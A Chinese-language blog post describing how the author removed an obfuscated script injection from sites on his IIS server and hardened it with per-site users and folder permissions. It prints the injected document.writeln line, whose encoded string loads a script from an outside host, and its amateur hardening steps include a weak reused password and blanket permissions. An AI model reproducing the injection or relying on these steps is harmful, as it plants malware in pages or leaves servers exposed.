秦氏哥哥发表关于：

我的网页被嵌入了类似"\x3C\x73\x63...."的木马_问题解决方案

很多网友在自己的网站上发现以下代码：

document.writeln("\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x4f\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2e\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2f\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");

一、经过大家共同解密得出结论为中了网页木马。但是，在百度以及狗狗上搜索解决方法一直无果，都是提问的。本人自己也架设了一台小型服务器，本人的服务器上也放置了多个网站，由于本人属于"新懒人(http://www.xinlanren.com.cn)"，所以对服务器的安全设置以及维护并没有太多用心，从而导致了朋友挂在我的服务上的网站频繁受到攻击。现在，偶尔发现诸多网站中都中了以上木马，在网上搜索经果中都是提问的，很郁闷，一直没有发现可以解决可行性方案。

二、经过我秦氏哥哥个人细心测试，得出以下结论可以解决。特此，将以下方法奉献给大家，共同分享。以下方法版权归秦氏哥哥所有，可任意转载，但请注明出处[//来源于：沂蒙生活信息网(www.016688.com)、秦弩文化官方站ww.qinnu.com)、秦氏哥哥51博客(http://oye8848.51.com)]，也算是对本人敲打这么多字以及奋战多日之辛苦的安慰。

三、经过使用以下方法，测试运行三天后到现在，问题已暂时性解决，但不知道以后还会不会再中招。其实我用的方法很简单，就是这个方法被大家忽视了而已。

1、如果只是一个网站，而网站内容是放在别人服务器上的或是租用主机商的朋友，那么，请你抓紧把你的网站用FTP下下来更换服务器主机空间吧。因为，中招的不单独指你的一个网站，而是服务器安全问题或是这个服务器主机上的其他网站漏洞造成攻击而连累到您的网站。所以，最好的解决方法是用FTP把它下下来，然后用"Dreamweaver或是文本替换专家"这两个软件，将您中的代码查找出来然后全部替换为空格。这种方法只能暂时性解决问题，重要的是别让你所托管的服务器主机空间上的其他有漏洞的网站再次感染您的网站。所以，替换木马代码后换个主机或是再重新再上传试一试。如果上传后还出现这种问题，无非两种解释，要么是你网站有漏洞被攻击写入木马，要么就是你的网站正常，但是与你网站共同托管的那台服务器上的其他网站有漏洞，从而"传染"了您的网站。这个方法用于：是指网站挂在主机提供、服务商那里的一种方法，目前我无法定义是从哪传播来的，但我知道，不是服务器安全没设置好就是网站有漏洞(//不是你的就是同在这个服务器上的其他网站)。

2、如果您有自己的服务器，而这个服务器上放了您的网站以及其他网站等多个站点的，那么请看好以下操作方法(和我一样啦，所以，我就是这样解决的)。
(一)，将服务器断网，IIS暂时关闭。
(二)，用"Dreamweaver或是文本替换专家"这两个软件，批量将您中的代码查找出来然后全部替换为空格。先用这种方法暂时性解决问题。(//等会，我秦氏哥哥的脖子有点累了，活动一下，好久没打字了，打会字真累，虽然用五笔，也累呀，脖子累。嘿嘿，不好意思。.....还是累，但想到大家一直为这该死的木马搞的头都大了的感觉，我累点也值了。开在开始...继续...)怎么样?替换完了吗?替换完了再查查看看还有吗?htm格式的,html格式的,ASP的,js的，php的，都查查，都找找，别漏了。如果替换完了的话，请继续操作。
(三)，给你的计算机添加上N个用户。(//操作方法举例说明为：我的电脑->右键->管理->计算机管理->本地用户和组->用户->右栏处点右键->新用户->用户名：qinshi->全名：qinshigege->描述：016688com->密码：016688->确认密码：016688->把"用户下次登陆时须更改密码"的勾去掉，把"用户不能更改密码"及"密码永不过期"这两个勾点上。->创建->然后返回，双击那个您创建的用户qinshi->出来个对话框->最头上有个"隶属于"点下->把"users"删除->添加上"Guests"->确定。//这只是教你如何添加用户，其实很简单，大家应该都会，但我想做的更完美一些，否则大家还问这问那的，倒不如写的清楚点，大家都能看懂都会用，这只是创建了一个用户，它只针对于一个网站的站点，如果您的服务器上有很多站点，你就要多创建几个用户，用户名与密码记好了哈，别忘记了，一会IIS还得用到。)
(四)，添加完用户后就得对网站所存放的盘符做设置权限了。(//先对硬盘盘符设置上安全，操作方法举例说明为：找到您的所要设置权限访问的网站文件夹，如E盘的qinshigege这个文件夹中的内容是我的个人主页来说明吧。->打开E盘右键属性->安全->把里面的用户全部删除->添加上"administrator管理员、backup Operators用户组、Power users用户组、SYSTEM用户组"->权限全部点上允许(不知道这样安全吧，我是从网上找的安全服务器设置方法中知道的，我也是菜鸟，但我是这样设置的)->确定。)
(五)，对网站所存放的盘符做设置权限了后，要对网站所存放的文件夹再设置上权限。(//先对网站所存放的文件夹设置上安全，操作方法举例说明为：找到您的所要设置权限访问的网站文件夹，如E盘的qinshigege这个文件夹中的内容是我的个人主页来说明吧。->打开E盘的qinshigege这个文件夹右键属性->安全->把里面的用户全部删除->添加上"administrator管理员、backup Operators用户组、Power users用户组、SYSTEM用户组"。这次操作，要把刚才创建的那个用户也添加进去"qinshi"，因为如果不添加的话，第六项要谈到IIS也得设置安全，所以，很有必要把它添加进入，否则IIS添加了后，网站访问的时候会提示您输入用户名与密码的，切记。->权限全部点上允许(不知道这样安全吧，我是从网上找的安全服务器设置方法中知道的，我也是菜鸟，但我是这样设置的)->确定。)
(六)，对网站所存放的盘符以及网站所放的文件夹也做设置权限了后，就可开始设置IIS站点的权限了。(//先对iis站点设置上安全，操作方法举例说明为：我的电脑->右键->管理->服务和应用程序->Internet信息服务->把您的WEB站点创建上，这一招不用我说了吧，有手动创建站点的，有用程序创建的，所以，我就不一一说明如何创建站点了，当然，如果你有好的程序可以自动创建站点，我很希望能与我一起分享一下，资源共享嘛，也算是对我的一点小小的回报吧，我秦氏哥哥的QQ是67081699欢迎您给我研究使用，资源共享，谢谢,我们继续操作吧->创建完站点后，如"秦氏弓弩"站点已创建完成并指向完成后->点这个"秦氏弓弩"站点的右键属性->探出对话框找到最上角的"目录安全性"->匿名访问和验证控制的"编辑"->再点匿名访问下的"编辑"->用户名用浏览找到刚才创建的用户"qinshi"->确定->输入上密码016688->一直点"确定"即可。)
(七)，访问一下，你的网站站点吧。试试有什么错误吗?如果没有那就好啦。如果有，会提示什么?如果提示错误，请到百度上搜索一下吧。如果提示网站访问时要求提示输入用户名与密码的话，那说明，你的权限在某一处出现错误，可以检测一下，1、创建用户时，是否与硬盘上的用户权限对正，或许IIS上的匿名访问设置用户是否对正起来，或许是你的网站文件其中的一个文件的权限是否也将"qinshi"这样创建的用户能对起来... ...想必其他问题百度上应该可以找到解决方法，不过，我经以上设置后，还没有出现错误。
(八)、如以上安全设置服务器后，每个网站的站点都要设置上访问用户。这样的话，就算是某一个站点有漏洞被攻击了，也不会影响到其他站点，这样就可以很容易的入手来解决到底是哪个站点出现漏洞或被攻击了。
(九)，累死我了，争取写到十，这样来个十全十美吧。可是我实在是没有什么好补充的了，因为，我除了这样做以外别的我也没有操作什么来解决这个该死的网页木马了。因为，截止到现在，我的服务器的上那些站点还没有出现过什么异常被挂入木马或是攻击现象了。也许是我幸运?还是确实这招管用?但是，我总感觉还有什么没有解决出来似的。因为，我还没有查出来到底是我的哪个站点出现漏洞可以被他们利用。也许，这需要我下一步的研究与检测吧。
(十)，这样的木马，暂时就只能这样解决了，亲身经历，所以，用心打了这么多字，也许有更多的朋友，更多的高手用别的或是简单的方法来解决这个问题，但是，我却在网上没有找到一步一步的解决操作方法。

四、特此以上文章，献给所有网页被嵌入了类似"\x3C\x73\x63...."的木马困扰的朋友们，希望大家能发表你们的看法或是更好的解决方法，资源共享嘛。文笔不好，专业性不强，所以，话不通顺请大家原谅。也请大家在转载的时候注明一下秦氏哥哥我的版权，谢谢。

五、祝大家好运，希望这个方法能帮您解决目前的困境。

六、感谢黑客让我们成长。

七、附软件工具(进入网站用讯雷下载绝对路径)：

文本查找替换专家  http://xiazai.016688.com/文本查找替换专家.exe

八、版权信息归秦氏哥哥所有  资源共享与交流QQ号:67081699  文章来源于：沂蒙生活信息网http://www.016688.com  秦弩文化网http://www.qinsh.com  新懒人电子商务网http://www.xinlanren.com.cn  眼镜哥哥个人博客 http://oye8848.51.com